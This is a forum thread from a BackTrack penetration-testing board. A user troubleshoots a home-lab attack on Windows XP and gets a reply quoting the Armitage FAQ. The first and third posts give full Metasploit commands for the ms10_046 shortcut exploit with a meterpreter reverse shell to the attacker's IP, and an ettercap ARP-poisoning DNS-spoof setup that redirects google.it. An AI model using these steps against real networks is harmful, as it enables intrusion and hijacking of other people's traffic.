Results 1 to 3 of 3

Thread: Backtrack vs Windows (Metasploit and DNS spoofing problem)

  1. #1
    Just burned his ISO
    Join Date
    Oct 2011
    Posts
    2

    Default Backtrack vs Windows (Metasploit and DNS spoofing problem)

    Hi guys, i hope that 1 of you can help me with a exploit of armitage on backtrack 5 R1 32 bit (virtual machine).
    I open this thread because i don't found manual or other thread on the websites.
    I wanna know which problem has my armitage and why i can not attack the target.
    Armitage has been started but there are warning message and i don't like this.
    I write step by step:

    BACKTRACK IP 192.168.1.6
    TARGET IP 192.168.1.8


    1. STEP

    root@bt:~#/etc/init.d/mysql start

    Rather than invoking init scripts through /etc/init.d, use the service(8)
    utility, e.g. service mysql start

    Since the script you are attempting to invoke has been converted to an
    Upstart job, you may also use the start(8) utility, e.g. start mysql
    mysql start/running, process 2871

    (I don't see problem here)

    2. STEP

    root@bt:~#msfrpcd -f -U msf -P test -t Basic
    [*] XMLRPC starting on 0.0.0.0:55553 (SSL):Basic...[*] XMLRPC ready at 2011-10-07 12:06:51 +0200.

    (I don't see problem here)

    3. STEP

    root@bt:~#armitage

    Warning: /root at preferences.sl:309
    Doing a secure socket!
    Warning: No collaboration server is present! at collaborate.sl:94
    Warning: Writing to: /root at armitage.sl:201

    (Now armitage are been started, but there are this warning messages)

    4. STEP

    Click Hosts ---> Nmap Scan ---> Quick Scan (OS detect)

    I write the ip address of my target:

    192.168.1.8

    Click Ok, Nmap start the scan and when finish i see the host.

    (I don't see problem here)

    5. STEP

    I click over the host and then Attack ---> Find Attacks ---> by port

    When this is complete i see the exploit if right click over target host.

    Attack ---> Hail Mary ---> by port

    When this is complete, Hail Mary report this:

    1) Finding exploits (via db_autopwn)

    [192.168.1.8] Found 16 exploits

    2) Sorting Exploits

    3) Launching Exploits



    4) Listing sessions

    msf > sessions -v

    Active sessions
    ===============

    No active sessions.

    (Here, the 16 exploit founded have not hit the target but i don't understand the reason)

    6. STEP

    Now i've think that if i make a DNS spoofing attack its good to send the target over my server "ms10_046_shortcut_icon_dllloader" with payload "windows/meterpreter/reverse_tcp" and...

    Attack ---> Browser Attacks ---> Windows ---> ms10_046_shortcut_icon_dllloader

    use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
    meterpreter > set LHOST 192.168.1.6
    LHOST => 192.168.1.6
    msf exploit(ms10_046_shortcut_icon_dllloader) > set DisablePayloadHandler true
    DisablePayloadHandler => true
    msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVPORT 80
    SRVPORT => 80
    msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(ms10_046_shortcut_icon_dllloader) > set TARGET 0
    TARGET => 0
    msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 0.0.0.0
    SRVHOST => 0.0.0.0
    msf exploit(ms10_046_shortcut_icon_dllloader) > set URIPATH /
    URIPATH => /
    msf exploit(ms10_046_shortcut_icon_dllloader) > exploit -j[*] Exploit running as background job.[*] [*] Send vulnerable clients to \\192.168.1.6\PDcC\.[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk[*] [*] Using URL: BackTrack Linux - Penetration Testing Distribution[*] Local IP: http://192.168.1.6:80/[*] Server started.

    Ok, now i need to send the target to this address: \\192.168.1.6\PDcC\
    The question is: CAN I USE DNS SPOOFING? I think yes. If "www.google.it" its my address: 192.168.1.6 and he write Google, he come over my server and i take the control.

    (I don't see problem here)

    7. STEP

    I open other shell and:

    root@bt:~#nano /usr/share/ettercap/etter.dns

    And i replace this:

    google.it A 192.168.1.6
    *.google.it A 192.168.1.6
    Google PTR 192.168.1.6

    Then i save and close and i start the DNS SPOOFING:

    root@bt:~# ettercap -T -q -i eth0 -P dns_spoof -M arp // //

    (I don't see problem here)

    8. STEP

    Check of armitage:
    [*] Sending UNC redirect to 192.168.1.8:1076 ...

    Check of ettercap textual mode:

    dns_spoof: [www.google.it] spoofed to [192.168.1.6]

    Check of target host browser:

    Google

    is:

    http://www.google.it/\\192.168.1.6\5CPDcC\

    (The problem here its the bad ridirect)

    END...

    I don't understand why the ridirect its: http://www.google.it/\\192.168.1.6\5CPDcC\ and if there are WARNING MESSAGES, or other problem that i need to fix. Thanks for patience.

  2. #2
    Just burned his ISO
    Join Date
    Mar 2011
    Posts
    4

    Default Re: Backtrack vs Windows (Metasploit and DNS spoofing problem)

    You're trying to do a lot of stuff here. I recommend getting it working one step at a time. However, to answer two of your questions (from the Armitage FAQ at http://www.fastandeasyhacking.com/faq ):

    5. I can't get any exploits to work. What am I doing wrong?

    Start with something that you know is exploitable. I recommend downloading the Metasploitable virtual machine. Hacking this will give you confidence that yes, exploits work and yes, you're probably using Metasploit correctly.

    Not all exploits work in all situations. Remember that you're sending code to a system that is meant to trigger a flaw. If a firewall is on, then maybe the data isn't getting to the service. Maybe you're running a version of the software that no longer has the flaw.

    Metasploit is not a magic key into other systems. Knowing what to use in different situations is a skill and it comes with experience.

    7. What are the warning messages in the console I launched Armitage from?

    These are harmless. They're debug output for me to read. I was too lazy to remove them. They always have the form Warning: some message here at file.sl:##. The scary "Warning" text is from the warn function in the language I used to write Armitage. Ignore it.

  3. #3
    Just burned his ISO
    Join Date
    Oct 2011
    Posts
    2

    Default

    I don't know the reason of this problems... I've see much videos about metasploit and seem easy. I'm a network manager and i know the networks security but here its not school and this job are not aviable from teacher!

    5. I've tried all exploit but not 1 that work.
    7. I open other shell to start ettercap to make DNS spoofing + Metasploit because i can not ridirect the target host over me if i don't Spoofing. (i don't know other ways)

    I've write all my step of attack...

    ps I make 1 step by time, this was all my history of this first attempt to break my home net security. I don't think that this pc is not penetrable because i've installed Windows XP sp3

    I've a news! Metasploit take control of Windows, but ONLY WITHOUT FIREWALL... I've tried too to setting my ettercap to make a DNS spoofing but the webpage its ever this:

    http://www.google.it/\\192.168.1.6\5CPDcC\

    This webpage can not be viewed because there are a error of syntax. Anyone can help me to ridirect the target over \\192.168.1.6\5CPDcC\ and not over http://www.google.it/\\192.168.1.6\5CPDcC\ ?

    My ettercap.dns are been setting with this conf:

    google.it A 192.168.1.6
    *.google.it A 192.168.1.6
    Google PTR 192.168.1.6

    Why the ridirect its http://www.google.it/\\192.168.1.6\5CPDcC\ ?

    Thanks again!
    Last edited by g0tmi1k; 10-08-2011 at 06:27 PM. Reason: Merged

Similar Threads

  1. BackTrack 4 R1, Windows 7 - Expert Problem
    By Pwnahz in forum Beginners Forum
    Replies: 10
    Last Post: 08-27-2010, 04:04 PM
  2. Replies: 25
    Last Post: 08-13-2010, 01:03 PM
  3. spoofing mac problem
    By mstfyounis in forum OLD Newbie Area
    Replies: 12
    Last Post: 12-23-2008, 08:52 AM
  4. WTF: Metasploit Website attacked by ARP spoofing?!?
    By imported_BaconZombie in forum OLD General IT Discussion
    Replies: 8
    Last Post: 06-04-2008, 07:25 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •